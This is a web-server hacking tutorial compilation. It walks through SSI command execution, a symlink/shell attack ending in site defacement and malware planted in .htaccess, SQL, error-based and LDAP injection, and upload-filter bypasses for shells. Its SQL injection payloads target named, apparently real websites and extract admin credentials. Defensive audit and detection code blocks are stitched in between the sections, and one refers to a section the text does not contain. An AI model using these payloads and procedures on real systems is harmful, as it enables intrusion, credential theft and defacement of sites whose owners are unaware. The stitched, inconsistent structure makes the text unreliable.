Server Side Includes let us do some things faster on sites. Through SSI we can update a
DB, send mails and many other functions. SSI works as if someone ran a script on that site.
The default extension for SSI files is .shtml.
To get SSI working, the directory where the .shtml file is located must contain a .htaccess file
holding the needed configuration.
SSI is disabled by default; you can enable it by creating a new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes

2) Creating SSI

We start a directive with <!--# and end it with -->.
A simple directive looks like this:
<!--#<command> <variable>=<variable content>-->
Code:
<command> - one of:
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date

Example script:
Code:
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.' -->

3) Server Side Inclusion

The Server Side Inclusion attack is a very useful attacking method. For it, basic knowledge of
Bash and Batch programming is recommended.

A site is vulnerable to SSI when the extensions '.shtml', '.shtm' or '.stm' are included in the Apache
config file.
e.g. we can create a file with the next command:
Code:
<!--#exec cmd='ls -la'-->

Save this as an .shtml file and open it on the site.

I think you already know what is going to happen.
Hope this helped you!
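
The directive syntax described above (<!--#command name="value" -->) is simple enough to parse, and parsing it is how a defender audits content that will be served through mod_include. The following is an added example, not the tutorial's code: a parser for that syntax plus an audit that flags exec directives and include directives with path traversal. SAMPLE_PAGE is constructed from the directives shown in this section plus one traversal include; the severity labels are assumptions.

```python
import re
from typing import Dict, List, Tuple

# <!--#command name="value" name2='value2' -->  (the syntax described above)
_DIRECTIVE = re.compile(r"<!--#\s*(?P<cmd>[a-z]+)\s*(?P<args>.*?)-->", re.S)
_ARG = re.compile(r"""(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)')""")


def parse_ssi(text: str) -> List[Dict]:
    """Return every SSI directive in text as {'command', 'args', 'raw'}."""
    found = []
    for m in _DIRECTIVE.finditer(text):
        args = {}
        for a in _ARG.finditer(m.group("args")):
            args[a.group("name")] = a.group("dq") if a.group("dq") is not None else a.group("sq")
        found.append({"command": m.group("cmd"), "args": args, "raw": m.group(0)})
    return found


def audit_ssi(text: str) -> List[Tuple[str, str]]:
    """Flag directives that run code or reach outside the document tree.
    Returns (severity, raw directive) pairs in document order."""
    findings = []
    for d in parse_ssi(text):
        if d["command"] == "exec":
            findings.append(("high", d["raw"]))      # cmd= or cgi= executes on the server
        elif d["command"] == "include" and ".." in "".join(d["args"].values()):
            findings.append(("medium", d["raw"]))    # traversal in file= / virtual=
    return findings


# Constructed .shtml page: the echo and include from the text, one traversal
# include, and the exec directive shown above.
SAMPLE_PAGE = """<html><body>
<!--#echo var='This will write this stupid text.' -->
<!--#include file="yourfilename.txt" -->
<!--#include virtual="../../private/config.inc" -->
<!--#exec cmd='ls -la'-->
</body></html>"""

if __name__ == "__main__":
    for severity, raw in audit_ssi(SAMPLE_PAGE):
        print(severity, raw)
```

On the configuration side, Apache's `Options IncludesNOEXEC` keeps include/echo working while disabling exec, which removes the case the audit rates "high"; the .htaccess shown above enables the full `Includes` option instead.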

Symlink Attack :
1] Upload shell 404.php
2] Upload contact.php & database.php

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php

3] go to [sec. info] in your shell, then [readable : etc/passwd <view>]
4] copy all usernames & passwords from [ etc/passwd ]
5] paste them in the [ config fucker ] tab of [ http://site.com/contact.php ].
6] now open both of your links : [ http://site.com/database.php & http://site.com/configweb ]

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/

7] on the configweb page [ you have some text that contains user & password ] [ these files are
the details of the reverse (linked) websites ]
8] Now log in to them using database.php [ change the password in the database ]
9] then log in to the main site and deface its index.php page.
Malware Attachment On Website :
1] Go to the Public Html tab on your 404.php shell,
2] open .htaccess on your shell
3] and paste your malware code.
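
Both procedures above leave artefacts a host owner can look for: a symlink inside one site's document root that resolves to another site's files, and a .htaccess carrying directives that load or execute foreign code. The following is an added example, not the page's own tooling: an audit that walks a document root for symlinks escaping it and for .htaccess files with risky directives. The fixture docroot, the "other_vhost" path and the directive list are constructed assumptions.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# .htaccess directives commonly abused to load or execute attacker-controlled code.
_HTACCESS_RISKY = re.compile(
    r"^\s*(php_value\s+auto_(prepend|append)_file|AddHandler\s+\S*php|"
    r"AddType\s+application/x-httpd-php|RewriteRule\s+.*\s+https?://)", re.I | re.M)


def find_escaping_symlinks(docroot: str) -> List[Tuple[str, str]]:
    """(link, resolved target) for every symlink under docroot whose target
    lies outside docroot. Symlinked directories are reported, not descended."""
    root = Path(docroot).resolve()
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if not p.is_symlink():
                continue
            target = p.resolve()      # follows the whole chain; fine for dangling links too
            if target != root and root not in target.parents:
                hits.append((str(p), str(target)))
    return hits


def find_risky_htaccess(docroot: str) -> List[Tuple[str, str]]:
    """(path, matched directive) for .htaccess files carrying risky directives."""
    hits = []
    for dirpath, _, filenames in os.walk(docroot):
        if ".htaccess" in filenames:
            path = Path(dirpath) / ".htaccess"
            for m in _HTACCESS_RISKY.finditer(path.read_text(errors="replace")):
                hits.append((str(path), m.group(0).strip()))
    return hits


def build_demo_docroot() -> str:
    """Constructed fixture: one in-tree link, one link escaping to another
    vhost's config, and one .htaccess that prepends a file to every PHP request."""
    base = Path(tempfile.mkdtemp())
    docroot = base / "public_html"
    plugin = docroot / "wp-content" / "plugins" / "akismet"
    plugin.mkdir(parents=True)
    (docroot / "style.css").write_text("body{}")
    (docroot / "css.css").symlink_to(docroot / "style.css")       # stays inside: fine
    other = base / "other_vhost" / "config.php"
    other.parent.mkdir()
    other.write_text("<?php $db_pass = 'constructed'; ?>")
    (plugin / "configweb").symlink_to(other)                      # escapes the docroot
    (plugin / ".htaccess").write_text("php_value auto_prepend_file /tmp/x.php\n")
    return str(docroot)


if __name__ == "__main__":
    demo = build_demo_docroot()
    print(find_escaping_symlinks(demo))
    print(find_risky_htaccess(demo))
```

On a shared host the structural fix is to stop the web server from following links across ownership boundaries (`Options -FollowSymLinks` with `SymLinksIfOwnerMatch`, or an open_basedir / per-user PHP process), so that the audit finds stale links rather than live access.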

Sql injection String & Union based :
1. Sql injection String based
[1] Description
In String based SQL injection:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site will show a normal page even though it is vulnerable
to SQLi)

[2] Example
The solution to this issue, in order to hack a site with String Based SQL injection, is to use the
following format:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query:
id=X' order by--+
Alright, now that you've got the point, let's try String Based on some of the other types of SQL
injection, shall we?
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show an error, so we'll assume 10 columns, since it'll be an example for our process
2. Obtaining the Databases
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step
3. Obtaining the Tables from the current Database
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5. Obtaining Data from Column names
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
6. Example :
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+
4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+
5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+
6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
9. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(table_name,0x0a),4 from information_schema.tables where table_schema=database()--+
10. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(column_name,0x0a),4 from information_schema.columns where table_name=0x61646d696e--+
11. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+

2. Sql injection Union based :
[1] Example
http://www.naukriguru.com
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10
3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20
4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50
5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40
6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30
7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35
8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33
9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32
10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema = database()--
20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name = 0x6e675f61646d696e--
21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin--
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php
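
Every step in both walkthroughs depends on one thing: the id parameter is pasted into the SQL text, so a quote ends the literal and "order by 1000" or "union select" becomes part of the statement. The following is an added example, not code from the page, that puts the vulnerable concatenation next to the parameterized query over a constructed in-memory SQLite schema (a news table and an admin table standing in for the sites above) and runs the page's own two probes against each. The table layout, row contents and payload strings are assumptions built from the text.

```python
import sqlite3
from typing import List, Tuple, Union

UNION_PAYLOAD = "x' UNION SELECT username, password FROM admin--"
ORDER_BY_PROBE = "latest_news' order by 1000--"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for the content.php site above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id TEXT PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO news VALUES ('latest_news', 'Site launch', 'We are live.');
        INSERT INTO admin VALUES ('admin', '$2y$10$constructed-hash');
    """)
    return conn


def fetch_news_vulnerable(conn: sqlite3.Connection, news_id: str) -> List[Tuple]:
    """String concatenation: the quote in news_id closes the literal and the
    rest of the input becomes SQL (the 'String based' case from the text)."""
    sql = "SELECT title, body FROM news WHERE id='" + news_id + "'"
    return conn.execute(sql).fetchall()


def fetch_news_safe(conn: sqlite3.Connection, news_id: str) -> List[Tuple]:
    """Bound parameter: the driver passes the value separately from the SQL,
    so quotes, comments and UNION inside news_id are just characters of an id."""
    return conn.execute("SELECT title, body FROM news WHERE id=?", (news_id,)).fetchall()


def probe(fn, conn: sqlite3.Connection, news_id: str) -> Union[str, List[Tuple]]:
    """Rows, or 'error' when the database raised. The author's 'order by 1000'
    test relies on exactly this visible difference between the two outcomes."""
    try:
        return fn(conn, news_id)
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", fetch_news_vulnerable), ("safe", fetch_news_safe)):
        print(name,
              probe(fn, db, "latest_news"),
              probe(fn, db, ORDER_BY_PROBE),
              probe(fn, db, UNION_PAYLOAD))
```

The parameterized version answers the order-by probe with an empty result instead of an error and the UNION payload with an empty result instead of the admin row, which is why neither the column-count step nor the extraction steps have anything to work with. Generic error pages (so that database errors are never echoed) are the second half of the defence against the error-based variants.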

Xpath Injection :
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
---------------------------------------------------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'

Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city'
msg: Could not query:XPATH syntax error: ' :cust_address'
=====================================================================
Note : In case I got :

Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'

=====================================================================
=====================================================================
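
All of the requests in the WordPress upload-handler section, the string/union SQL injection section and the extractvalue section above leave a recognisable trace in the web server's access log: order-by probes followed by a comment, UNION SELECT against information_schema, extractvalue() calls wrapped in /*! */ versioned comments, POSTs to a theme's upload-handler.php, and subsequent requests for .php files under wp-content/uploads. The following is an added example, not the page's tooling: a small detector over Apache combined-format log lines. The log lines, IP addresses (RFC 5737 documentation ranges) and signature names are constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log line: client, identd, user, time, request, status.
_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Signatures for the probes shown in the SQL and extractvalue sections.
_SQLI = [
    ("union_select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("order_by_comment", re.compile(r"\border\s+by\s+\d+\s*(--|#)", re.I)),
    ("extractvalue", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("mysql_versioned_comment", re.compile(r"/\*!\w*")),
]
# Theme upload handlers, and PHP being served from the uploads tree.
_THEME_UPLOAD = re.compile(r"/wp-content/themes/[^/]+/.*upload-handler\.php$", re.I)
_PHP_IN_UPLOADS = re.compile(r"/wp-content/uploads/.*\.php\d?$", re.I)


def analyze_line(line: str) -> Optional[Dict]:
    """Parse one log line and list the signatures it trips; None if unparsable."""
    m = _LOG.match(line)
    if not m:
        return None
    raw_path = m.group("path")
    decoded = unquote_plus(unquote_plus(raw_path))   # twice: catches %2527-style double encoding
    stripped = re.sub(r"/\*!?|\*/", " ", decoded)    # /*!select*/ -> " select "
    findings = [name for name, pat in _SQLI if pat.search(decoded) or pat.search(stripped)]
    base = decoded.split("?", 1)[0]
    if m.group("method") == "POST" and _THEME_UPLOAD.search(base):
        findings.append("theme_upload_handler_post")
    if _PHP_IN_UPLOADS.search(base):
        findings.append("php_under_uploads")
    return {"ip": m.group("ip"), "method": m.group("method"), "path": raw_path,
            "status": int(m.group("status")), "findings": findings}


def analyze_log(lines: List[str]) -> List[Dict]:
    """Only the entries that tripped at least one signature, in log order."""
    results = []
    for line in lines:
        r = analyze_line(line)
        if r and r["findings"]:
            results.append(r)
    return results


# Constructed log lines shaped after the requests in the text; the last one is
# a benign request included to show the detector stays quiet on it.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Dec/2014:10:01:02 +0000] "GET /index.php?id=10%27+order+by+1000--+ HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Dec/2014:10:01:09 +0000] "GET /index.php?id=-234%27+UNION+SELECT+1,2,group_concat(schema_name),4+from+information_schema.schemata--+ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Dec/2014:10:02:31 +0000] "GET /recipe.php?ID=3+and+extractvalue(rand(),/*!concat*/(0x0a,version()))-- HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Dec/2014:10:05:00 +0000] "POST /wp-content/themes/amplus/functions/upload-handler.php HTTP/1.1" 200 40 "-" "python-requests/2.4"',
    '198.51.100.7 - - [22/Dec/2014:10:05:03 +0000] "GET /wp-content/uploads/2014/12/uploaded.php HTTP/1.1" 200 1200 "-" "python-requests/2.4"',
    '192.0.2.9 - - [22/Dec/2014:10:06:00 +0000] "GET /index.php?id=10 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for r in analyze_log(SAMPLE_LOG):
        print(r["ip"], r["method"], r["status"], r["findings"], r["path"][:60])
```

Note that POST bodies are not logged, so the SQL signatures only see injection carried in the query string; the upload-handler rule therefore keys on the path and method, and the follow-up request for a .php file under uploads is the stronger indicator that the upload actually landed. In the application itself, the "Could not query:XPATH syntax error" messages quoted above are the other detection point: a database error reaching the response body should be logged and alerted on rather than rendered.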

LDAP injections :

---[ 0x01: Introduction ]

LDAP (Lightweight Directory Access Protocol) is a lightweight protocol to access the X.500
directory service. This protocol works over TCP/IP.
The LDAP access protocol is used to query and modify stored objects.


---[ 0x02: LDAP Filters ]


It is quite important to understand how LDAP filters work. They are defined in
RFC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515).

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" /"~="/ ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue


Logical operators:
- AND "&"
- OR "|"
- NOT "!"

Relational operators:
<=, >=, =, ~=

The wildcard "*" is used to replace characters.

Filter example:
(&(objectClass=user)(uid=*)): returns a list of all objects of type user, whatever the value
of the attribute "uid".


---[ 0x02: LDAP injection in Web Applications ]

The LDAP injection technique is very similar to SQL injection.
The attack is used to exploit websites that build LDAP statements directly from
data supplied by the user.

Vulnerable code with comments (by Sacha Faust):

+++++++++++++++++++++++++++++++++++++

line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:
line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>

+++++++++++++++++++++++++++++++++++++


On line 10 note that the userName variable is initialized with the value of the parameter
user and then quickly validated to see if the value is empty.
If the value is not empty, the variable userName is used to initialize the variable filter
on line 18.
This new variable is used directly to build an LDAP search, passed to SearchFilter
on line 27.
The attacker therefore has full control over what will be queried on the LDAP server.
The result of the query is shown when the code reaches lines 32 to 40, where all results
and their attributes are displayed to the user.

Example 1:
http://website/ldap.asp?user=*

In this example the character "*" is sent in the "user" parameter, which ends up
in the variable filter.
This LDAP statement will match any object that has a uid attribute, so
all users and their information are shown.


Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)

It will show us the home directory path of the user ka0x.
You can run your own tests against the code above before moving on.
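
Line 18 of the ASP sample is the bug: the user value goes into the filter with no escaping, so "*" and ")(|(" are interpreted as filter syntax. The following is an added example, not code from the paper: an RFC 4515 escaper for assertion values, the vulnerable and the hardened filter builder side by side, and a final check that the built filter is exactly one (attr=value) item. The two injected values are the ones from Example 1 and Example 2 above; the function names and the validator regex are my assumptions.

```python
import re
from typing import Dict

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_ESCAPES: Dict[str, str] = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied assertion value so it can only ever be data."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter_vulnerable(user_name: str) -> str:
    """What line 18 of the ASP sample does: raw concatenation."""
    return "(uid=" + user_name + ")"


def build_user_filter(user_name: str) -> str:
    """Hardened equivalent: the value is escaped before it enters the filter."""
    return "(uid=" + escape_filter_value(user_name) + ")"


# Exactly one equality item whose value contains no unescaped metacharacters.
_SINGLE_EQUALITY = re.compile(
    r"^\((?P<attr>[A-Za-z][A-Za-z0-9-]*)=(?P<value>(?:[^()*\\\x00]|\\[0-9a-fA-F]{2})*)\)$")


def is_single_equality_item(ldap_filter: str) -> bool:
    """True when the filter is a lone (attr=value) with an RFC 4515-clean value.
    Useful as a last-line check right before the SearchFilter assignment."""
    return _SINGLE_EQUALITY.fullmatch(ldap_filter) is not None


if __name__ == "__main__":
    for name in ("ka0x", "*", "ka0x)(|(homedirectory=*)"):
        vuln, safe = build_user_filter_vulnerable(name), build_user_filter(name)
        print(f"{name!r}: vulnerable={vuln} ok={is_single_equality_item(vuln)} | "
              f"safe={safe} ok={is_single_equality_item(safe)}")
```

With escaping in place, Example 1 becomes a search for a user literally named "*" and Example 2 a search for a user named "ka0x)(|(homedirectory=*)", neither of which exists; the wildcard and the extra filter component never reach the directory server as syntax.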


---[ 0x03: Links ]

http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://es.wikipedia.org/wiki/LDAP
http://www.ldapman.org/


__EOF__

# milw0rm.com [2007-11-04]

© Offensive Security 2011

Part 2
Web server Hacking
Using the above vulnerabilities, various types of hacks can be used to compromise a web
server.

Guide content:

- Shell Uploading Guide
- Shell uploading through php-my-admin
- Shell Jumping
- Symlink Bypass 2013 for Linux Servers
- Hack Web-DAV & Deface
- Root server without local root exploit
- LINUX SERVER ROOTING Tutorial
- Cpanel Cracking
- Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error
- Backdoor a WEB SERVERS WITH WEBACOO
- Web Server Hacking through Command Injection
- How To Hack Windows Servers Using Dubrute 2.2
- Symlink Tutorial for beginners
- MASS DEFACE TUTORIAL
- How to hack a websites using Symlink Bypassing
- ATTACKING WEBSERVERS VIA .HTACCESS
- How to Back-connect with netcat
- Hacking Cold Fusion Servers - Part I
- Hacking Cold Fusion Servers - Part II
So let’s get started !
1. Shell Uploading Guide

Many newbies face problems while uploading a shell on a site after getting admin access / logging
in to that site, so I am writing this in order to help them. Basically a shell gives us remote access
to that server. Such shells are available in different languages like php, asp/aspx, cgi etc., so we
have to choose a shell that will work on the server according to the server's scripting language. If
the server supports php then we choose a php shell, otherwise asp or cgi. Now let's come to the
main point: after logging in to the site, if we find any upload option in the site, then we can
easily upload a shell. But sometimes we have to make some changes to upload a shell.

Way 1
As the shell is in PHP format, some sites do not allow uploading such scripts directly with the
php extension. If so, just rename the shell. Add .gif/.jpg/.html/.doc etc. Example: suppose before
renaming the shell name was shell.php; then we rename it as shell.php.jpg or anything else.

Way 2
Upload a simple uploader shell first that isn't detected by antivirus and firewalls, then upload
your shell through your own shell. You can download an uploader shell from here.

WAY 3
SOME SERVER FIREWALLS DETECT THE SHELL SCRIPT BY CHECKING THE
headers and don't allow us to upload a shell. We can bypass this by using the "GIF89A SHELL
SCRIPT BYPASS" method: open your shell in Notepad and add "GIF89a;" (without quotes) before the
shell code starts, like below:
GIF89a;

Depending on what kind of file validation they are using, this may fool the server into thinking
it's an image: when it reads the file it finds the GIF header and assumes it's safe since it's an
image.
WAY 4
This method is more advanced. It only works against client-side filters, not server-side ones.
Download Firebug for Firefox, then edit the HTML of the upload form:
<form enctype="multipart/form-data" action="uploader.php" method="POST"> Upload
DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br /> <input
type="submit" value="Upload File" /> </form>

Change the accept filter to *.* or just remove it completely; it will then let you upload any type
of file.

WAY 5
Download the "Live HTTP Headers" add-on for your Firefox browser first.
1. Rename your shell to shell.php.jpg (or whatever that site supports. In my case, the site
